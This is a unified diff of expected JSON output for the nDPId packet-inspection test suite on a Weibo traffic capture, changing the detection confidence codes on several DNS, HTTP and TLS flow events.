00635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1463089073423,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":190,"pkt_l4_len":156,"thread_ts_msec":1463089073423,"pkt":"eJKcD6iOkDVu60UQCABFAACwAABAAEARtoLAqAEBwKgBaQA1oYgAnCOtK+iBgAABAAUAAAAAAmpzAXQGc2luYWpzAmNuAAABAAHADAAFAAEAAAA8AAcEd2NkbsARwCwABQABAAAAKQAVBnNpbmFqcwVjc2dsYgV0eGNkbsAYwD8ABQABAAAEEgAUCG40Y3N3aGszBWdjY2RuA25ldADAYAABAAEAAAADAARdvIb2wGAAAQABAAAAAwAEXbyG8Q=="} -00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072885,"flow_last_seen":1463089073423,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1463089073423,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"js.t.sinajs.cn","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.246"}} 
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072885,"flow_last_seen":1463089073423,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1463089073423,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"js.t.sinajs.cn","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.246"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":16804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1463089073424,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1463089073424,"pkt":"kDVu60UQeJKcD6iOCABFAAA4KDhAAEARjsLAqAFpwKgBAUGkADUAJAai81YBAAABAAAAAAAAAWMFd2VpYm8CY24AAAEAAQ=="} 
-00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":16804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"c.weibo.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":16804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"c.weibo.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1463089073424,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073424,"pkt":"kDVu60UQeJKcD6iOCABFAAA8dN1AAEAGHxvAqAFpXbyG9ovjAFD5+n7QAAAAAKACchAf3wAAAgQFtAQCCAoAQQoNAAAAAAEDAwc="} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1463089073478,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1463089073478,"pkt":"eJKcD6iOkDVu60UQCABFAACdAABAAEARtpXAqAEBwKgBaQA1yPAAiVtu8RCBgAABAAUAAAAAAWcGYWxpY2RuA2NvbQAAAQABwAwABQABAADy0wAXAWcGYWxpY2RuA2NvbQdkYW51b3lpwA7AKgABAAEAAAGzAAQvWUHlwCoAAQABAAABswAEL1lBx8AqAAEAAQAAAbMABC9ZQcbAKgABAAEAAAGzAAQvWUHk"} 
-00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":306,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073478,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073478,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"g.alicdn.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"47.89.65.229"}} +00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":306,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073478,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073478,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"g.alicdn.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"47.89.65.229"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1463089073479,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073479,"pkt":"kDVu60UQeJKcD6iOCABFAAA8KD5AAEARjrjAqAFpwKgBAcVlADUAKPnf1EwBAAABAAAAAAAABGRhdGEFd2VpYm8DY29tAAABAAE="} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50533,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"data.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50533,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"data.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1463089073479,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073479,"pkt":"kDVu60UQeJKcD6iOCABFAAA8PQxAAEAGymDAqAFpL1lB5caLAbuG5TcXAAAAAKACchASAQAAAgQFtAQCCAoAQQobAAAAAAEDAwc="} 
00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1463089073488,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1463089073488,"pkt":"eJKcD6iOkDVu60UQCABFAABiAABAAEARttDAqAEBwKgBaQA10NoATp++kZuBgAABAAIAAAAAA2xvZwZtbXN0YXQDY29tAAABAAHADAAFAAEAAAIfAAoDbG9nA2dkc8AQwCwAAQABAAAAIwAEjM2uAQ=="} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073488,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"log.mmstat.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"140.205.174.1"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073488,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": 
{"query":"log.mmstat.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"140.205.174.1"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48352,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1463089073488,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073488,"pkt":"kDVu60UQeJKcD6iOCABFAAA8K\/hAAEAGEeTAqAFpjM2uAbzgAbtP+SHlAAAAAKACchCeNwAAAgQFtAQCCAoAQQodAAAAAAEDAwc="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -148,25 +147,25 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1463089073537,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073537,"pkt":"kDVu60UQeJKcD6iOCABFAAA8abpAAEAG1CHAqAFpjM2uAbzkAbvb32OTAAAAAKACchDQkgAAAgQFtAQCCAoAQQopAAAAAAEDAwc="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1463089073616,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073616,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+OyanX1+fp+0aAS\/\/9YyQAAAgQFqAQCCAoDdg1LAEEKDQEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1463089073616,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073616,"pkt":"kDVu60UQeJKcD6iOCABFAAA0dN5AAEAGHyLAqAFpXbyG9ovjAFD5+n7Rsmp19oAQAOWGdAAAAQEICgBBCj0Ddg1L"} 
-00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073424,"flow_last_seen":1463089073616,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":398,"flow_tot_l4_payload_len":398,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1463089073616,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"js.t.sinajs.cn","url":"js.t.sinajs.cn\/t5\/register\/js\/v6\/pl\/base.js?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073424,"flow_last_seen":1463089073616,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":398,"flow_tot_l4_payload_len":398,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1463089073616,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"js.t.sinajs.cn","url":"js.t.sinajs.cn\/t5\/register\/js\/v6\/pl\/base.js?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1463089073635,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073635,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGFnUvWUHlwKgBaQG7xos8arg3huU3GIASOQiHzQAAAgQFqAEBBAIBAwMJ"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1463089073635,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089073635,"pkt":"kDVu60UQeJKcD6iOCABFAAAoPQ1AAEAGynPAqAFpL1lB5caLAbuG5TcYPGq4OFAQAOUAuQAA"} -00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073479,"flow_last_seen":1463089073635,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1463089073635,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"g.alicdn.com","ja3":"58e7f64db6e4fe4941dd9691d421196c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} 
+00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073479,"flow_last_seen":1463089073635,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1463089073635,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"g.alicdn.com","ja3":"58e7f64db6e4fe4941dd9691d421196c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1463089073759,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073759,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGFnUvWUHlwKgBaQG7xo+u1rhnnywRAoASOQgi\/AAAAgQFqAEBBAIBAwMJ"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1463089073759,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089073759,"pkt":"kDVu60UQeJKcD6iOCABFAAAoGylAAEAG7FfAqAFpL1lB5caPAbufLBECrta4aFAQAOWb5wAA"} 
00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1463089073760,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1463089073760,"pkt":"eJKcD6iOkDVu60UQCABFAACPAABAAEARtqPAqAEBwKgBaQA1xdAAe7w5O9aBgAABAAMAAAAABmFjanN0YgZhbGl5dW4DY29tAAABAAHADAAFAAEAAAJYAAcEYWNqc8ATwC8ABQABAAABAAAhBGFjanMGYWxpeXVuA2NvbQNnZHMKYWxpYmFiYWRuc8AawEIAAQABAAAAbAAEKpy4Ew=="} -01024{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":424,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073760,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"acjstb.aliyun.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"42.156.184.19"}} 
+01024{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":424,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073760,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"acjstb.aliyun.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"42.156.184.19"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
